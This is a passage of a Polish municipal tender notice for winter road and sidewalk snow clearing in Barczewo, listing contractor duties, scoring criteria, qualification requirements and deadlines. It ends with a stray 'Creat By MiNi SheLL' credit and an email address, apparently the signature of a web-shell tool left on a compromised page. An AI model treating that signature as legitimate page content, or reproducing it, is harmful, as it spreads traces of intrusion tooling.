infrastruktury drogowej (tj. sprzęt lekki – do odśnieżania<br/>chodników w sektorach 1, 2, 5, 6); sprzęt ciężki – do odśnieżania pozostałych terenów).<br/>5. Wykonawca zobowiązuje się do przyjęcia zgłoszenia od Zamawiającego<br/>we wszystkie dni tygodnia, święta i niezależnie od panujących warunków atmosferycznych.<br/>Wykonawca zobowiązany jest do podjęcia czynności odśnieżania i usuwania śliskości ciągu<br/>………….godzin (ilość godzin zostanie ustalona podczas negocjacji), od przyjęcia zgłoszenia, a<br/>przejezdność dróg ma być uzyskana zgodnie<br/>z wymaganiami określonymi w standardzie utrzymania dróg gminnych ujętych<br/>w Zarządzeniu Nr 0050.221.2019 Burmistrza Barczewa z dnia 14 listopada 2019 roku w sprawie<br/>ustalenia standardów zimowego utrzymania dróg na terenie Miasta i Gminy Barczewo i<br/>zakwalifikowania ich do poszczególnych standardów, stanowiący załącznik do zaproszenia do<br/>negocjacji. Wykonawca ma obowiązek prowadzenia ewidencji realizowanych usług. Wykonawca<br/>jest w stosunku<br/>do zamawiającego, w dyspozycji 24 – godzinnej w zakresie przyjęcia zgłoszenia<br/>i wykonania usługi. Wykonawca udostępnia dyżurny – całodobowy numer telefonu i przyjmuje<br/>zgłoszenia wyłącznie od uprawnionego przedstawiciela Zamawiającego. Odbiór wykonanych<br/>prac nastąpi przez osobę upoważnioną<br/>ze strony Zamawiającego.<br/>6. Za wykonanie przedmiotu zamówienia Zamawiający zapłaci wykonawcy wynagrodzenie<br/>według stawki - ceny jednostkowej za jedną godzinę zimowego utrzymania dróg, przy czym do<br/>miesięcznego fakturowania liczy się wyłącznie<br/>te usługi odśnieżania, które przedstawiciel Zamawiającego zgłosił wykonawcy<br/>do wykonania. Do faktury wykonawca musi załączyć potwierdzone przez przedstawiciela<br/>Zamawiającego (uprawnionego pracownika Wydz. Budownictwa i Inwestycji UM w Barczewie<br/>lub właściwego miejscowo sołtysa lub radnego) miesięczne zestawienie wykonanych usług<br/>wskazujące na ilość i jakość wykonanego zakresu robót. Zamawiający dopuszcza możliwość<br/>w sytuacjach awaryjnych, kierowania wykonawcy do pracy w innym sektorze<br/>lub na innych drogach. Zamawiający dopuszcza do realizacji niniejszej usługi użycie wyłącznie<br/>zarejestrowanych pojazdów posiadających ważne badania techniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje w okresie 3 lat od dnia udzielenia zamówienia podstawowego, udzielenie dotychczasowemu Wykonawcy usług,<br/>zamówienia polegającego na powtórzeniu usług w zakresie zimowego utrzymania publicznych dróg gminnych i gminnych ciągów<br/>komunikacyjnych na<br/>terenie gminy Barczewo w latach 2022 – 2023, w ilości do 50% godzin podanych w poszczególnych częściach i do 50% wartości<br/>szacunkowej każdej części</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Każda oferta niepodlegająca odrzuceniu zostanie oceniona wg wyżej<br/>wymienionych zasad. Ocenę oferty stanowi suma punktów określona<br/>dla poszczególnych kryteriów wg wzoru:<br/>Of = Ck+B gdzie:<br/>Of – ilość punktów uzyskana przez badaną ofertę;<br/>Ck – ilość punków uzyskana przez badana ofertę w kryterium ,,Cena brutto oferty’’;<br/>B – ilość punków uzyskana przez badana ofertę w kryterium ,,Czasu podjęcia czynności odśnieżania<br/>od przyjęcia zgłoszenia (w godz.)’’.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona<br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą<br/>ofertę.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w ustawie Pzp, oraz w swz i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona<br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą<br/>ofertę.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli Zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród<br/>niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podjęcia czynności odśnieżania od przyjęcia zgłoszenia (w godz.)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Nazwa i opis warunków udziału w postępowaniu.<br/>Wykonawca spełni warunek, jeśli wykaże, że do realizacji przedmiotu zamówienia dysponuje lub<br/>będzie dysponował co najmniej jednym pojazdem mechanicznym zaopatrzonym w podwieszany<br/>pług oraz podwieszaną przystawkę do posypywania mieszanką piasku i soli oraz jednym<br/>pojazdem mechanicznym lekkim do odśnieżania chodników (jeżeli Wykonawca złoży ofertę na<br/>część 1, 2, 5, 6 (sektor), na którym taki sprzęt jest niezbędny<br/>do należytego wykonania przedmiotu zamówienia).<br/>Pojazdy mechaniczne muszą być dopuszczone przez właściwe instytucje do ruchu na drogach<br/>publicznych, mieć zamontowaną lampę ostrzegawczą<br/>z pomarańczowym, migającym światłem ostrzegawczym. Sprzęt zatrudniony do prac winien być<br/>wyposażony w liny holownicze, haki, łopaty. Wykonawca zobowiązany jest zapewnić utrzymanie<br/>pełnej sprawności technicznej sprzętu,<br/>a w przypadku jego niesprawności zapewnić w czasie nie dłuższym niż jedna godzina sprzęt<br/>zastępczy spełniający te same wymogi.<br/>UWAGA:<br/>W przypadku składania oferty na więcej niż jedną część (sektor), Wykonawca powinien<br/>dysponować np. dla dwóch sektorów, dwoma jednostkami sprzętu<br/>do odśnieżania, tzn. w ofertach nie można powtarzać tej samej jednostki sprzętowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia<br/>16.02.2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 8 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz<br/>narzędzi, wyposażenia zakładu lub urządzeń technicznych<br/>dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania<br/>ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy<br/>z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w<br/>jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy – załącznik 4 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia został opisany we wzorze umowy tj.: w § 12 załącznika nr 1<br/>do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-26 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy zakupowej dostępnej na stronie: https://platformazakupowa.pl/pn/barczewo w myśl Ustawy Pzp. na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-26 08:35</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-24</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców:<br/>Zamawiający przewiduje możliwość ograniczenia liczby Wykonawców, których zaprosi do negocjacji, tj. maksymalnie trzech<br/>Wykonawców, których niepodlegające odrzuceniu oferty uzyskały najwyższą łączną liczbę punktów według kryteriów oceny<br/>ofert określonych w Rozdziale XIX SWZ .

Creat By MiNi SheLL
Email: jattceo@gmail.com